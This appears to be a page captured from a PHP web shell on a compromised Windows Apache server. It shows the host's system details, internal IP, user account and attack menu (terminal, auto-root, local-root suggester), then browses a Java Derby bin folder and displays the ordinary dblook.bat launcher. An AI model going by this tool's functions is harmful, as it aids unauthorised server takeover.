Windows NT KAMIDAKI 10.0 build 19045 (Windows 10) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.3.9
Server IP : 192.168.3.16 & Your IP : 216.73.216.140
Domains :
Cant Read [ /etc/named.conf ]
User : SISTEMA
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
C: /
Program Files /
Java /
jdk1.7.0_80 /
db /
bin /
Delete
Unzip
Name
Size
Permission
Date
Action
NetworkServerControl
5.67
KB
-rw-rw-rw-
2024-08-25 16:37
NetworkServerControl.bat
1.38
KB
-rwxrwxrwx
2024-08-25 16:37
dblook
5.61
KB
-rw-rw-rw-
2024-08-25 16:37
dblook.bat
1.35
KB
-rwxrwxrwx
2024-08-25 16:37
derby_common.bat
2.37
KB
-rwxrwxrwx
2024-08-25 16:37
ij
5.74
KB
-rw-rw-rw-
2024-08-25 16:37
ij.bat
1.35
KB
-rwxrwxrwx
2024-08-25 16:37
setEmbeddedCP
1.05
KB
-rw-rw-rw-
2024-08-25 16:37
setEmbeddedCP.bat
1.25
KB
-rwxrwxrwx
2024-08-25 16:37
setNetworkClientCP
1.05
KB
-rw-rw-rw-
2024-08-25 16:37
setNetworkClientCP.bat
1.25
KB
-rwxrwxrwx
2024-08-25 16:37
setNetworkServerCP
1.05
KB
-rw-rw-rw-
2024-08-25 16:37
setNetworkServerCP.bat
1.24
KB
-rwxrwxrwx
2024-08-25 16:37
startNetworkServer
5.67
KB
-rw-rw-rw-
2024-08-25 16:37
startNetworkServer.bat
1.36
KB
-rwxrwxrwx
2024-08-25 16:37
stopNetworkServer
5.67
KB
-rw-rw-rw-
2024-08-25 16:37
stopNetworkServer.bat
1.37
KB
-rwxrwxrwx
2024-08-25 16:37
sysinfo
5.65
KB
-rw-rw-rw-
2024-08-25 16:37
sysinfo.bat
1.36
KB
-rwxrwxrwx
2024-08-25 16:37
Save
Rename
@echo off @REM Licensed to the Apache Software Foundation (ASF) under one @REM or more contributor license agreements. See the NOTICE file @REM distributed with this work for additional information @REM regarding copyright ownership. The ASF licenses this file @REM to you under the Apache License, Version 2.0 (the @REM "License"); you may not use this file except in compliance @REM with the License. You may obtain a copy of the License at @REM http://www.apache.org/licenses/LICENSE-2.0 @REM Unless required by applicable law or agreed to in writing, @REM software distributed under the License is distributed on an @REM "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY @REM KIND, either express or implied. See the License for the @REM specific language governing permissions and limitations @REM under the License. CALL "%~dp0derby_common.bat" %* if "%_JAVACMD%"=="" goto end if "%_USE_CLASSPATH%"=="no" goto runNoClasspath if not "%CLASSPATH%"=="" goto runWithClasspath :runNoClasspath "%_JAVACMD%" %DERBY_OPTS% -classpath "%LOCALCLASSPATH%" org.apache.derby.tools.dblook %DERBY_ARGS% %DERBY_CMD_LINE_ARGS% goto end :runWithClasspath "%_JAVACMD%" %DERBY_OPTS% -classpath "%CLASSPATH%;%LOCALCLASSPATH%" org.apache.derby.tools.dblook %DERBY_ARGS% %DERBY_CMD_LINE_ARGS% goto end :end set _JAVACMD= set DERBY_CMD_LINE_ARGS=